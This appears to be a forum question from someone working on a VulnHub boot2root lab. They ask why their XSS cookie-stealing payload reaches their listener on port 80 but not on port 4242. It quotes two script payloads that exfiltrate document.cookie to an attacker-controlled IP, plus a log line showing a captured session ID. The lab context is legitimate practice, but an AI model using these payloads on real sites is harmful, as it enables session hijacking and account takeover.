XSS on port other than 80 not working


I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.

The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers

<script>document.write('<img src="http://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>

And I get the cookie like this

192.168.1.14 - - [13/Sep/2020 09:23:36] "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -

But if I run my SimpleHTTPServer let’s say on port 4242 or any other port (I have tried a handful), the following payload does not trigger

<script>document.write('<img src="http://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>

Or at least I don’t see anything.

Please note that the boot2root VM seems to call every minute without fail.

I don’t know why this is happening. Does SimpleHTTPServer only work on port 80? It could be as simple as that, I guess, but I see examples on the internet with other ports being used so I doubt this is the case.